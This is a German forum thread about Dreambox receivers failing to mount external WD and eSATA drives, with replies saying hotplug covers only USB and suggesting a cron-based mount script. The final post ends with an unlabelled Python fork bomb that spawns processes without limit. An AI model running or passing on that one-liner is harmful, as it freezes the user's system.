Externe HDD Western Digital 3TB NTFS wird nicht gemountet

• Externe HDD Western Digital 3TB NTFS wird nicht gemountet

Hallo Leute,

wie im Titel zu sehen, bekomme ich meine externe Western Digital 3TB MyBook nicht gemountet :(

Der Device Manager erkennt die platte (wenn auch nicht in der richtigen Größe... wenn ich die Platte mounten will, dann versucht der Device Manager das anscheinend kurz, aber dann erscheint wieder die Übersicht, wo man sieht, das die Platte nicht gemountet ist :(

Ich habe die Dreambox auch schon mit angeschlossener USB Platte neugestartet, aber das brachte auch kein Erfolg :(

Hat einer ne Idee?
    • Ich kämpfe auch gerade mit meiner externen Sata Platte, allerdings an einer DM500HD.

Die Platte funktioniert nur wenn ich sie während dem Booten schon angeschaltet habe.

Bin vom Gemini gewechselt, dort konnte ich die Platte an und ausmachen wie ich wollte, wurde sofort eingebunden.

Geht das nicht automatisch?

Box runterfahren, Platte an, Box hochfahren, Timeshift ist nicht grad so effektiv :(
    • Jo, das hilft mir leider keinen Meter weiter.

Bei Ozoon und Gemini schalt ich die Platte an wann ich lustig bin und die wird sofort eingebunden.

Werd wohl wieder wechseln wenn das beim Newnigma nicht geht, schade :-/
    • Das geht weder beim oozoon , DMM Image noch bei uns, Hotplug ist und bleibt den USB-Laufwerken vorbehalten.

Anschließen kannst du die Festplatte schon, aber musst sie dann manuell mounten.
    • "Hotplog" geht schon ....

per cron minütlich mit script prüfen, ob die eSATA-Festplatte da ist (blkid + LABEL) - wenn nein umounten, wenn ja mounten

spätestens 2 Minuten nach dem einschalten ist die Platte gemountet ...
      Gruß Fred

Die Dreambox ist tot, es lebe die Dreambox

Dieser Beitrag wurde bereits 4 mal editiert, zuletzt von Fred Bogus Trumper ()

• Ich bin doch nicht bescheuert.
      Eben nochmal ausprobiert, sobald ich beim Ozoon die Platte anschalte, poppt ein Fenster auf und die Platte wird gemaunzt und funktioniert.

EDIT
      Da ist ein "Hotplug" Plugin mit drin hab ich gerade gesehen.

Gibts das Plugin auch für Newnigma?

Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von ravnos ()

• Ja gibt es aber das beschränkt sich auf usb.
      Sata/Esata ist nicht für hotplug vorgesehen ganz einfach und wird bei uns ignoriert das hatt also nichts mit einem bug zu tun das ist absicht weil der treiber dafür net ausgelegt ist bzw die hardware.
      Mag sein das es bei der harten methode funktioniert aber wenn die daten irgendwann mal schrott sind pech gehabt.
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !